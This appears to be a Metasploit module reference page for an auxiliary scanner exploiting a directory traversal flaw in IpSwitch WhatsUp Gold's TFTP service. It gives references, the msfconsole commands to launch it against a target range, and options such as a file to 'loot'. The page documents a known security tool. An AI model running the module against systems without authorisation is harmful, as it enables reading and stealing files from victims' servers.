IpSwitch WhatsUp Gold TFTP Directory Traversal
This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp Gold's TFTP service.
Rank
- Normal
Authors
- Prabhu S Angadi < >
- sinn3r < sinn3r [at] metasploit.com >
- juan vazquez < >
Vulnerability References
- OSVDB-77455
- BID-50890
- EDB-18189
- http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
msf auxiliary(ipswitch_whatsupgold_tftp) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(ipswitch_whatsupgold_tftp) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
msf auxiliary(ipswitch_whatsupgold_tftp) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(ipswitch_whatsupgold_tftp) > run
Module Options
| FILENAME | The file to loot (default: boot.ini) |
| RHOSTS | The target address range or CIDR identifier |
| RPORT | The target port (default: 69) |
| SAVE | Save the downloaded file to disk (default: false) |
| THREADS | The number of concurrent threads (default: 1) |
| ShowProgress | Display progress messages during a scan |
| ShowProgressPercent | The interval in percent that progress should be shown |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
